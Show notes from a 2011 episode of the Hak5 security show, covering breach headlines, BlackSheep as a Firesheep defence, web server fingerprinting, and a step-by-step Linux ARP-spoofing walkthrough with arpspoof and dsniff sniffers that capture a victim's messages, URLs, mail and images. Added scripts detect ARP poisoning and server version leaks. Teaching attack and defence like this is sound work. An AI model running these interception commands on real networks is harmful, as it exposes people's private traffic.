Hak5

Hosted by Darren Kitchen and Shannon Morse. New episodes Tuesdays.

Put together by a band of IT ninjas, security professionals and hardcore gamers, Hak5 isn't your typical tech show. We take on hacking in the old-school sense, covering everything from network security, open source and forensics, to DIY modding and the homebrew scene. Then we wrap it all up with a...

Linux man in the middle attacks, detecting Firesheep in Firefox, HTTPD fingerprinting & spy satellites!

Wednesday, April 13th, 2011 – running time 35:35

Defending against cookie hijacking attacks, man in the middle tools for Linux, fingerprinting web servers the easy way, managing multiple SSH sessions and tracking government spy satellites! All that and more, this time on Hak5!


Hacker Headlines

Jailbreaking is fun! RedSn0w has just been released by the DevTeam as a nice and easy untethered jailbreak for iOS 4.3.1. It's available on Windows and OSX for all your Apple devices, except for the iPad 2 because apparently the security on the new tablet has been beefed up. But, I'm sure it won't take long for someone to figure out a way around it.

While we typically don't follow the hijinks of Anonymous, the group has recently targeted Sony's PlayStation.com with a denial of service attack that left the website periodically inaccessible. The group released a manifesto announcing Operation Sony and pronounced the GeoHot lawsuit as an "unforgivable offense against free speech and internet freedom, primary sources of free lulz". Sony later tweeted that the PSN may be inaccessible due to "sporadic maintenance".

If you get some spam very soon in your inbox, it may be because of a security breach at Epsilon. Epsilon, the world's largest email marketing service, says the only information hackers got were names and email addresses. I've gotten several emails from companies so far, all saying the same thing- "your e-mail address may have been exposed by unauthorized entry into Epsilon's system bla bla bla"- but this still means we're more vulnerable to phishing scams and such. So, be aware and don't give out your info to any weird emails.

RSA recently outlined how their network was compromised in the much publicized attack on their network weeks ago. Over a 2-day period attackers sent two different phishing emails to employees with subjects like "2011 Recruitment Plan" which contained an attached Excel spreadsheet. The spreadsheet contained a zero-day exploit that took advantage of an Adobe Flash vulnerability. From there the attacker installed a customized version of the Poison Ivy RAT and began escalating privileges across the network. The Flash vulnerability has since been patched and RSA claims that the seeds used to generate RSA keys have not been compromised.

Just plain awesome! You remember the Commodore 64? Of course you do! Well apparently, Commodore USA is coming out with a brand spankin' new C64 with some nice PC specs, with advertisements alongside the release of Tron: Legacy on DVD. No details on the specs just yet, but I'll be checking back on their website to find out more...


Crack the Code Challenge

Do you have what it takes to compete in our Crack The Code Challenge -- brought to you by GoToAssist Express? Test your skills in our private lab network and bid for the title supreme leet hax0r. Winners will be featured on a future episode of Hak5!

Our next event will be this Sunday, April 24th at 3pm Pacific. Visit Hak5.org/challenge for all of the details. We'll be live streaming at hak5.org/live throughout the day. See you there!


ARP Spoofing with DSniff

Recently we've been having a lot of fun with man in the middle attacks. Shannon showed how to perform an ARP cache poisoning attack on Windows using Cain & Abel. I showed how to detect the attack using XARP. She showed off sidejacking with Firesheep. Honestly, eavesdropping is just plain fun. So this week I'd like to demo a couple of tools for us Linux folks.

Again the premise is all the same. We'll be using command line tools to tell our victim we're the router, and vice versa.

The tools we'll be using are the dsniff suite and driftnet. If you don't already have 'em and you're rocking Ubuntu it's simply a matter of issuing sudo apt-get install driftnet dsniff.

Before we get our attack started we'll need to enable packet forwarding. This means we'll allow the traffic of our targets to flow through our machine.

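# Check the current setting, enable forwarding (as root), then confirm it reads 1
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
# Use screen to keep each of the following tools in its own window
screen
# One arpspoof per direction, so each side's ARP entry for the other points at this machine
arpspoof -t 10.13.37.1 10.13.37.124
arpspoof -t 10.13.37.124 10.13.37.1
# Sniffers from the dsniff suite, plus driftnet for images
msgsnarf -i eth0
urlsnarf -i eth0
mailsnarf -i eth0
driftnet -i eth0
# Stop the spoofing when done
killall arpspoof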
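
Seen from the victim's side, this kind of spoofing leaves a trace in the ARP cache: the router's IP starts resolving to the spoofing machine's MAC, so one MAC often shows up against two IPs. The check below is an added example, not part of the original show notes; the function names and the sample table (constructed, in `/proc/net/arp` format) are assumptions for illustration.

```shell
#!/bin/sh
# Added example: list MAC addresses that answer for more than one IP.
# Input is an ARP table in /proc/net/arp format, read from stdin or a file.

arp_dupes() {
    awk '
        NR == 1      { next }    # skip the column header row
        $3 == "0x0"  { next }    # skip incomplete (unresolved) entries
        {
            mac = tolower($4)
            if (mac in ips) {
                ips[mac] = ips[mac] "," $1
            } else {
                ips[mac] = $1
                order[++n] = mac  # remember first-seen order for stable output
            }
            count[mac]++
        }
        END {
            for (i = 1; i <= n; i++)
                if (count[order[i]] > 1)
                    print order[i], ips[order[i]]
        }
    ' "$@"
}

# Constructed sample: 10.13.37.1 (the gateway here) and 10.13.37.66
# resolve to the same MAC, which is what a poisoned cache looks like.
sample_arp_table() {
cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
10.13.37.1       0x1         0x2         de:ad:be:ef:00:66     *        eth0
10.13.37.124     0x1         0x2         00:1b:21:aa:bb:cc     *        eth0
10.13.37.66      0x1         0x2         DE:AD:BE:EF:00:66     *        eth0
10.13.37.200     0x1         0x0         00:00:00:00:00:00     *        eth0
EOF
}

sample_arp_table | arp_dupes
```

On a live Linux host, run `arp_dupes < /proc/net/arp`. A multihomed host or proxy ARP can legitimately produce a duplicate, so a hit that includes the gateway's IP is the one to investigate first.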

Trivia

Last week's trivia question was: What is this prototype built in 1998 that encrypts telephone calls using the symmetric encryption algorithm IDEA? The answer was Cryptophon.

This week's trivia question is: What is the name of this prominent computer club that was founded in Berlin in 1981?

Answer at hak5.org/trivia for a chance to win some swag!


Blacksheep - Firesheep defense

On a recent episode, I walked you through how to use FireSheep to hijack another computer's session on your wireless network. I was able to see Darren log onto Twitter, click on his username, and write on his Twitter account as @hak5darren, not @snubs. Haha, I just hacked his Twitter, right?

Well, today, I'd like to show you BlackSheep, which does the exact opposite. If FireSheep is being used by someone on your network, you can be warned and block against it. BlackSheep is a Firefox add-on, just like FireSheep, that was based right off the same source code. So it reuses the same network listening back-end and that same list of sites and corresponding cookies, etc. By doing this, it ensures that the fake traffic generated by BlackSheep is what FireSheep is expecting to see. BlackSheep will even show you the IP address of the person's computer trying to hijack your account.

Now to get it working. First, download the BlackSheep add-on. Disable FireSheep if you have it as well, so BlackSheep doesn't detect it.

In the options menu, choose the interval at which you want BlackSheep to create fake traffic. Its default is 5 minutes, which works fine. Click OK and you're done configuring. Now, if FireSheep is detected on your network, you'll see this popup on your screen.

BlackSheep is available for Mac, Windows, and Linux. You still need WinPCap if you're on Windows, and it only works with Firefox, and only 32-bit.

Although BlackSheep does help with FireSheep, you should still be using HTTPS for your surfing.

Download Blacksheep


Identifying Web Servers

Wayno from pkill-9 sent this by. Two quick and dirty ways to ID a web server.


First:

curl -I www.hak5.org

Should result in:

HTTP/1.1 200 OK
Date: Tue, 05 Apr 2011 01:00:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Tue, 05 Apr 2011 00:04:06 GMT
Accept-Ranges: bytes
Content-Length: 66982
X-Pingback: http://www.Hak5.org/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8

The second, geekier way is to do it with telnet.

telnet www.hak5.org 80
HEAD / HTTP/1.0 

Want to share your tips with us? tips@hak5.org
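
The same header dump is useful for auditing what your own server gives away. The following is an added example, not part of the original show notes: it reads response headers on stdin (for instance piped from `curl -sI`) and lists every token that discloses a software version. The function names are assumptions, and the sample input is the header block shown above.

```shell
#!/bin/sh
# Added example: list version-disclosing tokens in HTTP response headers.
# Reads raw headers on stdin; prints "<header> <token>" for each disclosure.

version_leaks() {
    tr -d '\r' | awk '
        {
            i = index($0, ":")
            if (i == 0) next                 # status line or blank line
            name  = tolower(substr($0, 1, i - 1))
            value = substr($0, i + 1)
            sub(/^[ \t]+/, "", value)
        }
        name == "server" {
            # Server is a list of product/version tokens; report versioned ones
            n = split(value, tok, " ")
            for (k = 1; k <= n; k++)
                if (tok[k] ~ /\/[0-9]/) print "server", tok[k]
            next
        }
        name ~ /^x-(powered-by|aspnet-version)$/ && value ~ /[0-9]/ {
            print name, value
        }
    '
}

# Headers copied from the curl -I output shown on this page.
sample_headers() {
cat <<'EOF'
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2011 01:00:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Last-Modified: Tue, 05 Apr 2011 00:04:06 GMT
X-Pingback: http://www.Hak5.org/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/html; charset=UTF-8
EOF
}

sample_headers | version_leaks
```

Each line of output is a component an outsider can match against known-vulnerable versions. On Apache with PHP, `ServerTokens Prod` and `expose_php = Off` are the usual settings for trimming them.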


SSH Multiplexing & Satellite tracking

Steve writes:

Thank you so much for the info you have been giving out on screen, and multiplexing screens! I just wanted to make you aware, if you weren't already, of PuTTY Connection Manager. The most reported feature is the tabbed interface for PuTTY, but for me the best feature is the screen splitting. I can have one window with all of my putty sessions open and arranged how I want. Also, you can send commands to all viewable putty sessions, so I can run one command on each of my servers at the same time.

Nick writes:

Gpredict is a real-time satellite tracking and orbit prediction application, and it actually runs better on my WinblowsXP than it does on my many Ubuntu (10.4, 10.10, and bt4R2) laptops. It's really cool, I happen to be a Telecommunications/SatCom guy and this software is really neat because it has all the satellites' orbit locations pre-loaded and after you put in your geo coordinates it will tell you when the satellite will be visible and at what Azimuth and Elevation you should be using to see the beacon (via spectrum analyzer)... And if you have no idea what I'm saying: You can select all the military satellites from a drop down list and watch them move over the globe... NEAT!!!

Keep up with the latest on Hak5 by following us on Twitter or Facebook. Subscribe and get your weekly technolust delivered automatically. Or show your support and grab some swag from the HakShop - including the new airport friendly WiFi Pineapple and hoodie. Finally, if you'd like to suggest a topic or ask a question, feel free to hit up feedback@hak5.org.


About the Show

Show Title: Hak5
Description: Hak5 isn't your typical tech show. It's hacking in the old-school sense, covering everything from network security, open source and forensics to DIY modding and the homebrew scene. Damn the warranties, it's time to Trust your Technolust.
Categories: How-To & DIY, Technology & Gadgets
Launch Date: Sep 7, 2008